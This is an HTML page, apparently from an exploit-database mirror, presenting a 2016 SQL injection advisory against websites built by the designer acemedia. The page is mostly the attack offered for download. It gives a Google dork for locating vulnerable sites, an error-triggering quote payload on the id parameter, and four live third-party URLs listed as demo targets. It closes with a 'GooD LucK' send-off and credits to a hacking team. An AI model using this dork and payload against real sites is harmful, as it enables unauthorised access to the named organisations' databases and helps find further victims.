<html>
    <head>
        <link rel="shortcut icon" href="https://mr-msa.xyz/IMG/icon.png" type="image/x-icon">
        <style>
            html
            {
                background-color:black;
            }
            pre
            {
                color:green;
                font-size:11pt;
            }
            a
            {
                text-decoration:none;
            }
            button
            {
                background-color:green;
                width:200px;
                height:40px;
                color:#FFF;
                border:1px solid #999;
                border-radius:4px;
                
            }
            .back
            {
                width:60px;
            }
        </style>
        <title>exploit-40</title>
    </head>
    <body>
        <center>
                <a  href="https://mr-msa.xyz/guexdb/exploits/exploit-40" download>
                    <button>
                    Download
                    </button>
                </a>
                <a href="../database">
                    <button class="back">
                    Back
                    </button>
                </a>
        </center>
        <pre>
            ########################################################
# Exploit Title: acemedia SQL Injection
########################################################
# Date: [2016/2/4]
# Google Dork: intext:طراحی توسط acemedia inurl:?id=
# Exploit Author: Guardiran Security Team =>hitlrhacker
# Vendor Homepage: [http://www.acemedia.ir/]
# Software Link: [-]
# Version: All Version
# Tested on: [windows 8.1 & Google Chrome]
########################################################
# DISCRIPTION: Hello Guys.This vulnerability is SQL type
# We put ["] we can get the MySQL error
# For Example:
# [http://www.irtu.ir/index.php?id=19%22]'>http://www.irtu.ir/index.php?id=19%22]
# GooD LucK
########################################################
# Demo:
# http://www.irtu.ir/index.php?id=19%22
# http://iasbs.ac.ir/math/dep=4%22
# http://www.naria.info/view/14.aspx?id=346%22
# http://www.ir-translate.com/PU/link/ftc_page.aspx?id=1003107%22
########################################################
# Thanks to : C0d3!Nj3ct!0N | REX | abarestan | GrYpHoN | alizombie | DeMoN | ColEctOR
# We Are Guardiran Security Team
# Discovered By:hitlrhacker
########################################################
        </pre>
    </body>
</html>